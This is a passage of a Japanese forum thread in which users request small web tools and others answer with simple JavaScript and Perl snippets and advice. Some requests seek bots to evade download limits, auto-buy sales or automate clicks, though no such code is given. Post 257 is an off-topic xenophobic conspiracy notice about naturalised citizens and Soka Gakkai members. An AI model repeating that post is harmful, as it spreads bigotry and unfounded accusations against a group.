ただ単にメモリを書き換えるのはあるのですが
目的のプログラムをアクティブのまま、ホットキー等でオン、オフできるようなのを作って欲しいです
オンだけのならあるのですが・・・
144 :
2005/12/31(土) 02:58:26 ID:???
>>143
板違い。
145 :
2006/01/01(日) 11:04:20 ID:???
>>142
違う、その画面でdlkeyを入れて次の画面に進むの。
「一定時間内に呼び出される回数が、設定された回数を超えています。」
↑こんなページ。
そのページに指定されている時刻に最初にアクセスした人がダウンロード可能画面に進めるの。
つまり、「一定時間内に呼び出される回数が、設定された回数を超えています。」の画面でリロードをしこたま繰り返す必要があるわけ。


146 :
2006/01/04(水) 16:04:25 ID:???
キーワードから関連するblog記事のトラックバックURLを自動で抽出するようなの頼む
147 :
2006/01/07(土) 23:44:43 ID:???
>>145
dlkeyがわからんから自動化できん。
148 :
2006/01/07(土) 23:46:04 ID:???
>>146
> キーワードから関連するblog記事
これはどこから拾ってくるの?

> トラックバックURLを自動で抽出する
RDFで書かれていればここは楽勝かと。
149 :
2006/01/10(火) 22:55:17 ID:???
デスクトップに常に置いとけるアドレスバー(ファイル名を指定して実行)みたいなやつを作ってほしい。
150 :
2006/01/29(日) 16:27:54 ID:???
>>149
意味がわからん。というかそれはWebProgか?
151 :
2006/07/05(水) 01:27:39 ID:???
■希望金額:20000円払います
■対象スクリプト:掲示板基礎 鏡の国PHP掲示板http://script.s16.xrea.com/2ch/php/i/
         管理画面  したらばJBBS掲示板http://rentalbbs.livedoor.com/jbbs/sample.html
■依頼内容(期限):
MySQLとPHP4かmod_perl(速い方)で出来るだけ速い物を作って欲しい
したらばJBBS掲示板の管理画面の要素は全て残して欲しい
(掲示板タイトル、高度なカスタマイズ、許可ホストなど全て)
画像アップロード機能
2chの機能を全て持たせたい
スレスト機能(スレスト時の画も設定したい)
1000の画を設定したい
dat落ち機能
スレ圧縮機能などを持たせたい
スレッド保存領域を無限にして欲しい(2chと同様に)
パーソナライズ&RSS&スレ検索強化
3つのタイプのスレが建て放題
a. 完全匿名
b. 書き込み毎に匿名かID表示を選べる
c. 強制ID表示
P2Pと連動させたい
■理由:掲示板を開設したいから
■特別注文:CGIは圧縮した物のURLとは別にCGIのソースコードを丸ごとUPして欲しい
      著作物の著作財産権は放棄して欲しい
■メールアドレス:untokodoko@msn.com
152 :
2006/07/06(木) 00:06:16 ID:???
>>151
3、4桁金額が足りませんw

> 2chの機能を全て持たせたい
全てが公開されていないものの全てを実装するのは不可能です。

> 3つのタイプのスレが建て放題
> a. 完全匿名
インターネットの仕様上無理。ログを取らない=完全匿名ではない。経路にログが残る。

> スレッド保存領域を無限にして欲しい(2chと同様に)
意味がわからん。何を言いたい?

> P2Pと連動させたい
「何を」「どう」「何の目的で」?

> 著作物の著作財産権は放棄して欲しい
放棄でいいのか?譲渡でなくて?
153 :
(´・ω・`)
2006/07/12(水) 08:58:00 ID:0w+ziHlt
PC制限があるサイトのソース表示できるツールをお願いします★
154 :
nobodyさん
2006/09/09(土) 18:23:02 ID:GrCwteyY
あげ
155 :
nobodyさん
2006/09/10(日) 21:05:32 ID:zVKYsOR2
誰もおらんのか。暇だから何か作りたい。
156 :
nobodyさん
2006/09/10(日) 21:21:24 ID:DV0gsceM
2chの専ブラ作ってくれ。C++で
157 :
2006/09/11(月) 15:38:02 ID:???
無理
158 :
2006/09/12(火) 02:40:17 ID:???
まず言語何使えるか教えれ
159 :
2006/09/12(火) 07:18:07 ID:???
あまり出来ませんが、得意なのを強いて上げればtmlですかね。
あとxhtmlも得意です。cssは苦手です。
160 :
2006/09/12(火) 13:02:24 ID:???
それで何のツールなら作れると?
161 :
2006/09/12(火) 16:48:14 ID:???
得意なのはhtmlですが、htmも扱えますよo(^-^)oフォームタグを理解してますが、使う機会はありません。
CSSは苦手です。
162 :
2006/09/12(火) 17:19:00 ID:???
だからそのhtmlやhtmで具体的にどんなツールが作れると?
163 :
2006/09/13(水) 09:05:50 ID:???
あえていえばカレンダーとかですね。
cssは苦手です。
164 :
2006/09/13(水) 10:11:03 ID:???
簡単に言えば <table> を得意としています。
165 :
2006/09/13(水) 10:29:57 ID:???
でもcssは苦手です。
166 :
2006/09/13(水) 12:33:04 ID:???
分かった。
じゃあ今年のカレンダー作って。
167 :
CGI初心者
2006/09/14(木) 00:53:43 ID:G0x1AHcD
下記のような「出欠掲示板」CGIを探しているのですが
見つけることが出来ず、ここでお願いします!
--------------------------------------------------------
■画面構成
・名前表示(名札形式)
・出勤・休日・出張の区分枠内に名前札を移動させ状態表示
・出勤者・休日者・出張者 それぞれの人数をカウント表示させる
・パスワードによる編集画面への画面遷移機能

■編集画面
・名前札の新規作成・編集・削除機能
・名前札をそれぞれの状態(出勤・休日・出張)へ移動させる機能
 (ドラッグ&ドロップ等、極力簡単に)
・名前札毎にフォント色を変更できる機能(掃除当番は赤色表示等)
・区分枠の追加・削除機能

--------------------------------------------------------
以上、どうぞよろしくお願い致します。
168 :
2006/09/18(月) 20:14:18 ID:???
そういうのどっかで見たような気がする。
169 :
2006/09/19(火) 09:36:59 ID:???
高機能なHELLO WORLDを作ってください。
170 :
nobodyさん
2007/01/25(木) 00:41:07 ID:Zge3/y/b
Flickrから自分の画像を引っ張ってきて、画像を作成するツールを作ってくれる方はいませんか?
ユーザーがFlickrの画像を自由にリサイズ・移動させる→既定の別画像に合成→出力という感じです。
詳細はメールにて連絡するので、興味がある方はhb_alsyアットマークyahoo.co.jpにメールください。
お礼はほとんど出来ないと思いますが、何か考えてみます。

PHPほほとんど知識が無いのですが、これぐらいなら簡単に作れるのでしょうか…
「自由にリサイズ・移動」の部分をAjaxにするとなるとやはり高度になってしまうのかな。
171 :
2007/01/25(木) 01:35:20 ID:???
作れますがソースの中身は暗号かけますよ。それでもよければどうぞ
172 :
nobodyさん
2007/01/25(木) 19:40:19 ID:8jGa66EN
逆にAjaxのほうが簡単だろ
ぐぐればいくらでもある
173 :
2007/02/06(火) 23:22:47 ID:???
Ajax使う必要がわからん。
174 :
2007/02/12(月) 17:44:45 ID:???
メールアドレス管理
送信、未送信の区別
一括送信
一括登録
お願いします。
175 :
2007/02/12(月) 18:22:08 ID:???
楽天市場の時間指定セールなんかを自動的に購入
できるツールが欲しい
176 :
2007/02/13(火) 17:57:25 ID:???
>>174
http://pc10.2ch.net/test/read.cgi/php/1145308869/520-535
マルチ野郎はおとといきやがれですぅ。

>>175
そんなものを作ったら楽天のヒットマンに撃たれちゃうですぅ。
177 :
nobodyさん
2007/03/13(火) 19:02:37 ID:PIQgtD0y
xhtmlで target="_blank" をどういうジャバスクでおぎなってる?
178 :
2007/03/15(木) 22:55:36 ID:???
>>177
JavaScriptのことか?
Aタグのtargetをすべて置き換えればいいだけ。
179 :
ぬこえもん ◆hb//x7qyug
2007/03/20(火) 19:46:09 ID:YvMP85dh
>>176
「時間指定セール」ってどんなものです?
180 :
nobodyさん
2007/03/20(火) 19:52:11 ID:dEmSww00
ちょっとサイト制作で困っているんですが力かしてください

Flash MP3 Playerという↓
ttp://www.jeroenwijering.com/?item=Flash_MP3_Player
パーツを僕のサイトでしようしているんですが
曲の名前を漢字や平仮名にすると文字化けしてしまいます。
どうしたらいいでしょうか?

僕のサイトです。
ttp://www48.tok2.com/home/noriaki416/
181 :
ぬこえもん ◆hb//x7qyug
2007/03/20(火) 20:12:30 ID:YvMP85dh
>>180
X Japan大好きだから協力しちゃう
182 :
ぬこえもん ◆hb//x7qyug
2007/03/20(火) 20:15:42 ID:YvMP85dh
>>181
フォントじゃないかな?
英語のソフトだから日本語の文字セットというか日本語フォントに対応してないというか
183 :
nobodyさん
2007/03/20(火) 20:20:42 ID:dEmSww00
名前はNORIAKIと申しますww

ぬこえもん、詳しくお願いシマス!
HTMLに書かれていることコピペしましょうか?
184 :
NORIAKI
2007/03/20(火) 20:23:18 ID:dEmSww00
日本語のフォントに対応することは可能ですか?
Web作成の超初心者なので・・・・_| ̄|○

185 :
ぬこえもん ◆hb//x7qyug
2007/03/20(火) 20:41:56 ID:YvMP85dh
>>184
あ、playlist.xmlって使ってんだよね?
文字コードをUTF-8にすればいけるわ
186 :
NORIAKI
2007/03/20(火) 23:08:16 ID:dEmSww00
試してみます!
187 :
NORIAKI
2007/03/20(火) 23:29:09 ID:dEmSww00
>>185
文字コードをUTF-8にすればいけるわ
とありますが
どこをどんなふうにかえればよいのですか?
188 :
2007/03/21(水) 11:33:51 ID:???
文字コード
でググれ
189 :
NORIAKI
2007/03/21(水) 12:22:02 ID:mYSHDxhf
ワカラねぇです。

UTF-8はplaylist.xmlとかindex.htmlのドチラに入力するのでしょうか?

またどの部分に入力するのでしょうか?
190 :
NORIAKI
2007/03/21(水) 13:13:21 ID:mYSHDxhf
たぶんplaylist.xmlだと思うんで
書いていることかきます。
<playlist version="1" xmlns="http://xspf.org/ns/0/">
- <trackList>
<track>
<title>X JAPAN</title>
<creator>01.DAHLIA</creator>
<location>DAHLIA.mp3</location>
</track>
<track>
<title>X JAPAN</title>
<creator>02.EDNLESS RAIN</creator>
<location>Endless Rain.mp3</location>
</track>
<track>
<title>X JAPAN</title>
<creator>03.Forever Love</creator>
<location>foeever.mp3</location>
</track>
<track>
<title>X JAPAN</title>
<creator>04.紅</creator>
<location>kurenai.mp3</location>
</track>
191 :
NORIAKI
2007/03/21(水) 13:14:30 ID:mYSHDxhf
<track>
<title>X JAPAN</title>
<creator>05.Rusty Nail</creator>
<location>Rusty Nail.mp3</location>
</track>
<track>
<title>X JAPAN</title>
<creator>06.サイレント何とか</creator>
<location>asailent.mp3</location>
</track>
<track>
<title>X JAPAN</title>
<creator>07.SCRAS</creator>
<location>SCARS.mp3</location>
</track>
<track>
<title>X JAPAN</title>
<creator>08.途切れたメロディー</creator>
<location>TOGIRE.mp3</location>
</track>
<track>
<title>X JAPAN</title>
<creator>09.VAISHING LOVE</creator>
<location>VANISHING LOVE.mp3</location>
</track>
<track>
<title>X JAPAN</title>
<creator>10.WEEK END</creator>
<location>WEEK END .mp3</location>
</track>
</trackList>
</playlist>
192 :
NORIAKI
2007/03/21(水) 16:52:47 ID:mYSHDxhf
教えて〜〜ください
193 :
2007/03/21(水) 20:32:56 ID:???
だが断る。
194 :
2007/03/21(水) 21:53:35 ID:???
>>192
自分はTeraPad使ったんだけど、文字コード指定保存できるテキストエディタ使って
文字コードをUTF-8に指定して保存してみ
195 :
2007/03/23(金) 03:29:26 ID:???
酷い厨房だな
196 :
2007/03/23(金) 20:26:28 ID:???
とりあえずJASRAC
197 :
2007/06/29(金) 10:05:00 ID:???
1日1回のクリック募金を自動で行うツールをお願いいたします
対象のサイトは↓のような感じです
ttp://www.dff.jp/
ttp://clickbokin.ekokoro.jp/

「一番クリックした国が優勝」などのスレではいろいろクリックツールが開発されて
いるので、クリック募金にもツールがあれば便利だなと思いました
198 :
nobodyさん
2007/10/03(水) 15:14:35 ID:pPRcBg+r
199なら全ての鯖落をなくすのをください
199 :
nobodyさん
2007/12/27(木) 02:32:45 ID:gAgkfxPT
PCが使えない期間、スレのdatを保存したいので
ツールを実行しているWEBスペースにdatを保存するものが欲しいです。
携帯(ドコモのムーバ)で実行します。

http://pc11.2ch.net/test/read.cgi/php/1078997682/,依頼されたツールを誰かが作るスレ
http://pc11.2ch.net/test/read.cgi/php/1036141603/,七行プログラミング

のようなdat保存候補のスレURLファイルを読み込んで、
リスト表示。10件ごとにページ区切り。
リストの各スレのリンクで、そのスレのdatを「boardname/no.dat」(例:php/1078997682.dat)に保存。
すでにdatを保存していた場合、新しいdat取得が成功したら、新しいものと差し替え。

お願いします。
目的が達成できるのなら、既存のものでも構いません。
200 :
nobodyさん
2007/12/30(日) 21:38:26 ID:p1W7yWqS
某ゲームで見やすくするためにjavascriptで作ってもらいたいものです

ttp://up2.viploader.net/pic/src/viploader549945.jpg
攻撃側 ○○ ([x:xxx:x])
武器: 130% シールド: 140% アーマー: 130% タイプ 軽.戦闘艦 巡洋艦 バトルシップ
合計 2.278 1.000 871
武器 115 920 2.300
シールド 24 120 480
アーマー 920 6.210 13.800

これを「コピペ汁」にコピペして「へんかん」を押すと

攻撃側 ○○ ([x:xxx:x])
武器: 130% シールド: 140% アーマー: 130%
軽.戦闘艦 2.278
巡洋艦 1.000
バトルシップ 871

と「変換後」に吐き出す奴を作ってもらいたいのですが><
お願いします><
201 :
2007/12/31(月) 11:06:39 ID:???
>>200
俺は完全に作るつもりは無いが、データの具体例をもう少し出した方が
いいと思う。
改行やスペース、コロンがしっかりと統一されているのであれば、
splitやらsubstrあたりの文字列操作を使えば実現出来ると思う。
ttp://www.tohoho-web.com/js/string.htm#split
202 :
2007/12/31(月) 11:42:52 ID:???
>>200
細かい仕様が分からない状況であったので、すべてのデータで動くかは試してみないと分からないよ。

<html><body>
<script type="text/javascript">
<!--
function chTx() {
var in_str;
var out_buf1;
var out_buf2;
var out_buf3;
var out_buf4;
var out_str;
in_str = document.F1.inTx.value;
out_buf1 = in_str.split("\n");
out_buf2 = out_buf1[1].split(" タイプ ");
out_buf3 = out_buf2[1].split(" ");
out_buf4 = out_buf1[2].split(" ");
out_str = out_buf1[0] + "\n" + out_buf2[0] + "\n";
out_str = out_str + out_buf3[0] + " " + out_buf4[1] + "\n";
out_str = out_str + out_buf3[1] + " " + out_buf4[2] + "\n";
out_str = out_str + out_buf3[2] + " " + out_buf4[3];
document.F1.outTx.value = out_str;
}
// -->
</script>
<form name="F1"><table><tr><td>変換前:</td><td>変換後:</td></tr>
<tr><td><textarea name="inTx" cols=50 rows=10></textarea></td><td>
<textarea name="outTx" cols=50 rows=10></textarea></td></tr>
<tr><td><input type="button" value=" 変  換 " onclick="chTx()"></td><td></td></tr>
</table></form></body></html>
203 :
nobodyさん
2008/01/14(月) 15:18:15 ID:EfBJtKo/
>>201-202
ありがとうございます
>>200は変換してもらいたいやつを●●コピペしたものです
204 :
2008/01/14(月) 15:20:36 ID:???
>>200です
本当にありがとうございました><
これを見て頑張ってみようと思います
205 :
nobodyさん
2008/01/14(月) 19:43:13 ID:eCWTSi3Z
このサイトにあるDomain Age Toolですが、
一度に10個までしか調べないので
これを一度に大量に調べられるようなツールが欲しいです。

http://www.webconfs.com/domain-age.php

よろしくお願いします。
206 :
2008/01/19(土) 01:38:01 ID:???
パチスロの設定判別ツールが欲しいです
207 :
nobodyさん
2008/05/15(木) 10:55:22 ID:lkg/xcrw
ttp://www.livejasmin.com/listpage.php?tags=couple

上記の琵琶を天才の方々、新しく作製して下さい。
宜しくお願い致します。
208 :
2008/09/15(月) 11:54:56 ID:???
動画のエンコード鯖作りたいんですけどどこにも例とか書いてないので自分で作れません。
少し考えてアップローダー+フォルダ監視+FFMPEGでやってるんですが変換状況とか表示されないので使いづらいです。
どなたかwebでアップロードして変換率が表示されて変換後にDL画面が表示される物をcgiかPHPで作っていただけないでしょうか。
サーバーはApache2.2forWindowsを使用しています。
209 :
2009/02/28(土) 07:35:24 ID:???
アマゾンの在庫切れ商品だけ(マケプレは別)抽出するツールくだシャイ
210 :
2010/01/08(金) 16:11:35 ID:???
ここの質問に自動で回答するツールを作って下さい
211 :
nobodyさん
2010/01/27(水) 05:41:29 ID:GiLd8zqz
液晶モニタでスキャンラインまたはそれに似たフィルタ効果を、WINXPでかけてくれるようなソフトはないでしょうか??

既存の物でも作ってくれるのでしたらなんでもかまいません

212 :
nobodyさん
2010/03/04(木) 21:26:37 ID:jcOwAT8e
ttp://ch2.ath.cx/
ttp://sv2ch.baila6.jp/sv2ch01.html
上記のような、サーバーの負荷を監視するプログラムをPHPで作る方法を教えていただきたいです。
「○分ごと監視」の機能は必要ありません。
よろしくお願いいたします。
213 :
2010/03/04(木) 21:55:50 ID:???
MRTGでぐぐれ
214 :
2010/03/04(木) 22:13:48 ID:???
>>213
一見、これサーバ管理者が自分のとこのサーバを診るツールのようなのですが・・・。
そうではなく、外側の人間が反応速度などからある程度の負荷を推測できれば、というのが希望です。
前述2番目のサイトの下の方にやり方らしきものが書いてあるのですが、PHPでの書き方がわからないのです。
215 :
2010/03/04(木) 22:16:40 ID:???
確か2chのは、各サーバがtop値をファイルに書き出していて、それを拾ってグラフ化してる。
通常はSNMPを使って値を読み出して、加工する事になると思う。
216 :
2010/03/04(木) 22:21:47 ID:???
うひゃ、出遅れた。
cronで10分単位でテキストファイル取得しにいって、加工してhtmlを書き出すだけっしょ。
217 :
2010/03/07(日) 00:04:38 ID:???
>>213
>>215=216
ありがたす!
218 :
2010/03/07(日) 01:18:56 ID:???
便乗だけど
それってxreaサーバーに対してもできたりしますか?
219 :
2010/05/07(金) 20:29:07 ID:???
あるディレクトリ内のID内のファイルをURLとして一覧表示できるものを作っていただけないでしょうか?
説明が難しいですが以下のような感じです。
test(設置ディレクトリ)
 |
 ├index.cgi(一覧表示するツール)
 │
 ├aaa(ディレクトリ)
 ││
 │└id(ID格納ディレクトリ)
 │ │
 │ ├aaaid1(表示させたいID)
 │ │
 │ └aaaid2(表示させたいID)
 │
 └bbb(ディレクトリ)
  │
  └id(ID格納ディレクトリ)
   │
   ├bbbid1(表示させたいID)
   │
   └bbbid2(表示させたいID)

これをindex.cgi内で
―――――――――――――
http://***.jp/test/aaa/indexcgi?id=aaaid1
http://***.jp/test/aaa/indexcgi?id=aaaid2

http://***.jp/test/bbb/indexcgi?id=bbbid1
http://***.jp/test/bbb/indexcgi?id=bbbid2
―――――――――――――
のようにaaaとbbbのディレクトリ内のものだけ(testディレクトリには他のディレクトリもある為)を一覧表示させたいです。
説明が分かり辛いかとは思いますが、どなたか宜しくお願い致します。
220 :
nobodyさん
2010/05/07(金) 23:32:08 ID:57oVjhsy
ちょっとよくわかんないのですが
aaa/id/の下にIDファイルがあるのですか?
この場合の id/は固定でいいんですよね?
print "Content-type: text/html\n\n";
# 対象のディレクトリ
my @dirs = ( 'aaa', 'bbb', );
foreach my $dir (@dirs) {
if (opendir(DIR, "./$dir/id")) {
my @files = grep { !m/^(\.|\.\.)$/g } readdir(DIR);
closedir(DIR);
foreach my $file (@files) {
print "http://***.jp/test/$dir/indexcgi?id=$file\n";
}
}
}
221 :
2010/05/08(土) 23:13:29 ID:???
>>220
ありがとうございます!
早速今からアップしてきます。
本当にありがとうございました。
222 :
2010/05/09(日) 00:59:06 ID:???
>>220
連続ですみません。
完璧に理想通りに出来ました。
本当にありがとうございました。

これからタイトルを取得できるようにして
ちゃんとしたリンク形式で表示できるようにしてきます!
223 :
2011/02/12(土) 19:39:28 ID:???
>>175
あるじゃん。
ttp://www.shopdingdong.com/
224 :
2011/07/13(水) 06:02:00.10 ID:???
エクセルから一発でWEBページの指定空欄にコピペできるツールください。
225 :
2011/07/13(水) 08:04:42.90 ID:???
COMで
226 :
2011/07/21(木) 17:24:21.18 ID:???
単語をコピーしたときに勝手にタブが開いて、トップページのヤフーから検索を自動で行ってくれる機能。
227 :
2011/07/22(金) 00:08:24.38 ID:???
いくらで?
228 :
2011/07/22(金) 08:13:04.25 ID:???
タブは毎回同じのでよく、コピー毎に新しいタブが開かないこと。常にトップページから検索してくれる。
ヤフーなどurlは設定できる。難点は作業中ただコピーしたいときにも作動してしまい、もたつくかも。
エクセル併用でつかうが、エクセルからのコピーは作動しなくていもよい。支障がなければいいが、改善点は完成しないとわからない。
1500円
229 :
2011/07/22(金) 08:39:27.01 ID:???
>>227、228
ヤフーがおおいけど、楽天とかあるから手作業の方が速いかも。
わからないので価格はなし。気が向いたら程度でどうぞ。
230 :
2011/07/22(金) 09:20:58.21 ID:???
>>229
別の解決方法がありましたw長くなりましたが、ありがとうございます。
231 :
2011/07/29(金) 15:12:11.15 ID:???
ttp://www.softaxle.com/pointclickmaster/%e3%83%80%e3%82%a6%e3%83%b3%e3%83%ad%e3%83%bc%e3%83%89/
最新の2.3のツールをダウンして、設定でサイト名とurlが自由に設定できデフォルトに戻らないよう改良してほしいです。
さらに登録urlを増やせるようにマスをふやし、スクロールできるといいです。
232 :
2011/07/31(日) 00:49:06.86 ID:???
いくらで?
233 :
2011/07/31(日) 13:57:29.69 ID:???
1500円どうです?たとえ同じサイトurlであって、登録でき、動作が想定どうりいった場合です。
うまくいかなければ又たのみます。
234 :
2011/07/31(日) 14:17:07.68 ID:???
>>232
できればですが、設定で登録したサイトを何周でもまわれる機能があればいいです。(+200円)
案件があるのを察知できる自動巡回などの機能などは複雑かもしれないので、とりあえず上記をお願いします。
235 :
2011/07/31(日) 14:19:16.73 ID:???
ソースは?
236 :
2011/07/31(日) 21:43:22.39 ID:???
専門的なことは一切わかりませんが、>>231上記urlでダウンロードして改良なりしてほしいです。
237 :
2011/07/31(日) 21:51:29.10 ID:???
>>236
ソースは?
238 :
2011/07/31(日) 23:26:35.01 ID:???
ソースとはプログラムのことでしたら、そういったものもありませんが、ただダウンしたソフトを上記みたいに改造してほしいです。
239 :
2011/08/05(金) 10:39:31.00 ID:???
だいたいの設定画面
もうひとつはとても長くて、ダウンロードしたほうがいいです

<?xml version="1.0"?>
-<TOOLCONFIG> <PRID>2</PRID> <SPID>11</SPID> -<SITECONFIG> <ITEM DATETIME="" USED="False" PASS="" USERID="" URL="http://dorubako.jp/index.php" SITENAME="ドル箱" ID="0"/> <ITEM DATETIME="" USED="False" PASS=""


</SITECONFIG> </TOOLCONFIG>
240 :
2011/08/05(金) 15:48:35.59 ID:???
これのurl含め、順番を変更して、見た目は変わっていても、元の順でおこなってしまいます。順番変更ができ、同じサイトも続けて登録できるようにしてください。
<?xml version="1.0"?>
<TOOLCONFIG>
<PRID>2</PRID>
<SPID>11</SPID>
<SITECONFIG>
<ITEM ID="0" SITENAME="ドル箱" URL="http://dorubako.jp/index.php" USERID="" PASS="" USED="False" DATETIME="" />
<ITEM ID="1" SITENAME="げん玉" URL="http://www.gendama.jp/" USERID="" PASS="" USED="False" DATETIME="" />
<ITEM ID="2" SITENAME="ポイントタウン" URL="http://www.pointtown.com/" USERID="" PASS="" USED="False" DATETIME="" />
<ITEM ID="3" SITENAME="ライフマイル" URL="http://www.lifemile.jp/" USERID="" PASS="" USED="False" DATETIME="" />
  〜など
    </SITECONFIG>
241 :
2011/08/05(金) 22:39:01.35 ID:???
いくらで?
242 :
2011/08/06(土) 11:34:55.83 ID:???
>>241
800円
さらに登録数を100までつくり、自由にサイトも入力できるといい。
サイトによりログイン後の動作が違うため、順番はかえられないかもしれない。
これを改良しても、exeの実行ファイルが元にもどしてしまうかもしれないのでおもいどおり作動できれば。
243 :
2011/08/06(土) 11:38:30.89 ID:???
やすっ
244 :
2011/08/07(日) 12:38:53.21 ID:???
>>243
なら1500円で
245 :
2011/08/08(月) 12:34:09.66 ID:???
>>244
1800円にします
246 :
2011/08/16(火) 09:49:09.28 ID:???
>>245
締め切ります
247 :
2011/12/22(木) 20:21:32.87 ID:???
アプリケーションの作成依頼です。

クリックを連打させるアプリが必要なのですが、
vector等に挙がっていたアプリを探してはみましたが自分の希望のものに沿わなかったため、
自ら一からプログラミングを学ぼうとしたのですが、挫折してしまいました。
こういうアプリが欲しい、というのは以下のものです。

「左クリックが押されている間(MK_LBUTTON?)、左クリックを1/1000秒おきに繰り返すし、Fキー(code70)で機能をON/OFFできる。」


このアプリのプログラムが難しいものなのかそうではないのか、それも分からない状態なのですが、
もし簡単なようであれば、諦めた手前図々しいのですが、作っていただきたいと思い、投稿させていただきました。
248 :
2011/12/23(金) 13:42:14.48 ID:???
それ自体は簡単だがネトゲのbotみたいにほかのアプリの入力をのっとるならムズイよ
249 :
2011/12/23(金) 16:49:12.09 ID:???
乗っ取ることはしないでいいのですが、できますか?
250 :
2011/12/23(金) 18:36:01.40 ID:???
>>249
できるがそれだと何の反応も示さないぞ
251 :
2011/12/23(金) 20:28:45.00 ID:???
ばぐ打ち(http://www.vector.co.jp/soft/winnt/util/se380756.html
というソフトのようには作動しないのでしょうか?

このソフトは割り当てたキーが連打の開始となりますが、
割り当てたキーではなく、単純に左クリックを押している間としたいのですが。
252 :
2011/12/25(日) 11:10:16.86 ID:???
>>234
200円で作れるなら自分でアルバイトを1時間1000円で雇って作らせて見ろよ
そんな桁が2桁間違ってるksみてえな価格じゃ誰もやりませんよ
253 :
2012/04/20(金) 23:44:29.15 ID:???
ちょっとでもカネをチラつかせる奴が出てくると過疎化しちゃうな。。。
 威張れる金額でもないのに…
254 :
nobodyさん
2013/03/23(土) 20:41:17.51 ID:yH/4I8SH
このスレまだ生きてるん?(´・ω・`)
255 :
めびうす ◆TFW118uHUg
2013/03/27(水) 23:17:48.80 ID:NJQ+JftD
お邪魔します(・∀・)ノ

2ch運営作業(規制解除)であったら便利なので、こんなツールをどなたか作ってくれませんか?

報告人用書き込み時間まとめツール

【鯖】@pages[http://atpages.jp/]
【言語】おまかせ
【動作の流れ】
1.フォームに開示ログをコピペしてsubmit
 ログ書式は、今はこんな感じ
 http://qb5.2ch.net/test/read.cgi/sec2chd/1361167650/58-64

2.ログの各行を抽出
 空行や↓のような各種コメントを無視して
> 58*2 名前:マグマ大佐 ★ [] 投稿日:2013/02/24(日) 14:21:36.47 ID:???0 (10)
>http://awabi.2ch.net/mlb/
256 :
めびうす ◆TFW118uHUg
2013/03/27(水) 23:18:02.83 ID:NJQ+JftD
3.項目の切り分け
 「<>」で区切られてるから先頭から6番目か7番目?

4.リモホ若しくはIPごとにまとめる

5.まとめた中で日付部分(<>区切りで先頭から3番目)を選ぶ

6.一番古い日付と一番新しい日付を見つける

7.IPごとに繰り返す

8.表示する
 こんな感じで
  2013/**/** **:**:** 〜 2013/**/** **:**:**
  Remote Host1(or IP1) ***res
  2013/**/** **:**:** 〜 2013/**/** **:**:**
  Remote Host2(or IP2) ***res
  2013/**/** **:**:** 〜 2013/**/** **:**:**
  Remote Host3(or IP3) ***res
257 :
nobodyさん
2013/03/28(木) 08:45:19.91 ID:GDwNmzjc
お知らせ

市原警察署の生活安全課の帰化人創価警官の指導の元、
入学式から2週間ほど、在日の創価学会員を主体とした自称防犯パトロールが、
2週間ほど行われることになりました

生活安全課の指導であることと、パトロールであることは、
絶対に公言してはいけないとの指導も、帰化人創価警官より出ています

期間中は2人組の在日の創価学会員が、頻繁に創価批判者の自宅周辺を、
うろつき回ると思われます
日本人の方は、充分に注意してください
258 :
2013/04/01(月) 01:41:10.06 ID:???
259 :
めびうす ◆TFW118uHUg
2013/04/01(月) 10:52:42.78 ID:Pie/C6aA
>>258
おお、ありがとうございますm(__)m

ついでに表示部分なんですが、リモートホストとIPアドレスとを同時に
書き出すことはできますか?
PHPの本、どっかにしまっててソース解読できないんでw
260 :
2013/04/01(月) 11:40:52.95 ID:???
>>259
修正しました。
再度落とし直して下さい
261 :
2013/04/01(月) 11:55:57.53 ID:???
>>260
素早い対応、ありがとうございます(・∀・)
262 :
2013/04/01(月) 21:57:33.10 ID:???
>>261
もういないかな。
正規表現に不備があり正しく集計されない不具合を修正しました。
263 :
2013/04/01(月) 21:58:54.43 ID:???
>>262
バグとりまで…。
ありがとうございますです m(__)m
264 :
2015/09/17(木) 17:53:29.77 ID:???
無知な人間が丸投げでごめんなさい^^;

○○というサイトでAという商品がでたら自動的に○○○円で入札するツール

お願いしたいのですが
88KB

新着レスの表示

★スマホ版★■掲示板に戻る■全部前100次100最新50

名前:E-mail: